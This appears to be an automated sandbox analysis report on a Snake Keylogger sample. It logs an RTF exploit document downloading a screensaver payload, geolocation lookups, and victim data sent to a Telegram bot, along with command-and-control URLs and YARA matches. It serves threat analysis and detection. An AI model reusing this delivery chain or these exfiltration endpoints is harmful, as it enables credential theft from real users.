                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443
                Source: global trafficTCP traffic: 104.21.52.88:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.52.88:443

                Networking

                Source: unknown, DNS query: name: api.telegram.org
                Source: Yara match, File source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE
                Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
                Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%207:26:36%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%207/27/2024%20/%2010:06:41%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A[%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                Source: Joe Sandbox View, IP Address: 132.226.8.169
                Source: Joe Sandbox View, IP Address: 149.154.167.220
                Source: Joe Sandbox View, ASN Name: TELEGRAMRU
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Joe Sandbox View, JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Joe Sandbox View, JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr DNS query: name: reallyfreegeoip.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe DNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe DNS query: name: reallyfreegeoip.org
                Source: global traffic HTTP traffic detected: GET /swagodi.doc HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: meridianresourcellc.top Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET /swagodi.scr HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: meridianresourcellc.top Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                Source: unknown HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49163 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49164 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49165 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49169 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 172.67.197.72:443 -> 192.168.2.22:49170 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49172 version: TLS 1.0
                Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4FA22C98-7DA0-493A-91D1-4967A9EB7810}.tmp
                Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global traffic DNS traffic detected: DNS query: meridianresourcellc.top
                Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
                Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 26 Jul 2024 21:45:48 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 26 Jul 2024 21:45:54 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgX
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comX
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000248D000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 
0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002465000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/X
                Source: unknown; HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknown; HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49168 version: TLS 1.2
                Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49194 version: TLS 1.2
                Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49203 version: TLS 1.2

                System Summary

                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Encrial credential stealer malware; Author: Florian Roth
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables with potential process hoocking; Author: ditekSHen
                Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR; Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65; Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, type: DROPPED; Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.; Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, type: DROPPED; Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.; Author: ditekSHen
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\swagodi.doc.url
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\meridianresourcellc.top.url
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Roaming\swagodi78811.scr
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scr; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exe; Memory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DE14820_2_006DE148
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DAF4820_2_006DAF48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D2B4820_2_006D2B48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DF72820_2_006DF728
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DC52820_2_006DC528
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D2B3820_2_006D2B38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DDB0820_2_006DDB08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DA90820_2_006DA908
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D050820_2_006D0508
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D050520_2_006D0505
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DD7E820_2_006DD7E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DEDC820_2_006DEDC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DBBC820_2_006DBBC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D09C520_2_006D09C5
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DA5D920_2_006DA5D9
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D09D020_2_006D09D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DD1A820_2_006DD1A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D39A020_2_006D39A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D21B820_2_006D21B8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DB58820_2_006DB588
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DE78820_2_006DE788
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B004020_2_021B0040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BB31820_2_021BB318
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B461820_2_021B4618
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BEE1020_2_021BEE10
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B391020_2_021B3910
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BC01020_2_021BC010
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B001620_2_021B0016
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B9D0820_2_021B9D08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BB30820_2_021BB308
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B900020_2_021B9000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B603820_2_021B6038
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B533020_2_021B5330
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BDA3020_2_021BDA30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BCD2820_2_021BCD28
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B462820_2_021B4628
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B602820_2_021B6028
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BC02020_2_021BC020
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B392020_2_021B3920
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B532020_2_021B5320
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BDA2020_2_021BDA20
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B945820_2_021B9458
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BAA5820_2_021BAA58
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B305F20_2_021B305F
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B875020_2_021B8750
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B944920_2_021B9449
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B7A4820_2_021B7A48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BF74020_2_021BF740
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B6D4020_2_021B6D40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B874420_2_021B8744
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B4A7B20_2_021B4A7B
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BDE7920_2_021BDE79
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B3D7820_2_021B3D78
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BC47820_2_021BC478
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BE97820_2_021BE978
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B577C20_2_021B577C
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BB77020_2_021BB770
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B307020_2_021B3070
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BAA6820_2_021BAA68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B3D6820_2_021B3D68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BC46820_2_021BC468
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BB76020_2_021BB760
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B8B9920_2_021B8B99
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B719820_2_021B7198
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B649020_2_021B6490
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B578820_2_021B5788
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BDE8820_2_021BDE88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BD18020_2_021BD180
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B4A8020_2_021B4A80
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B648020_2_021B6480
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B34B820_2_021B34B8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BBBB820_2_021BBBB8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B98B020_2_021B98B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BAEB020_2_021BAEB0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021BF2A820_2_021BF2A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_021B8BA820_2_021B8BA8
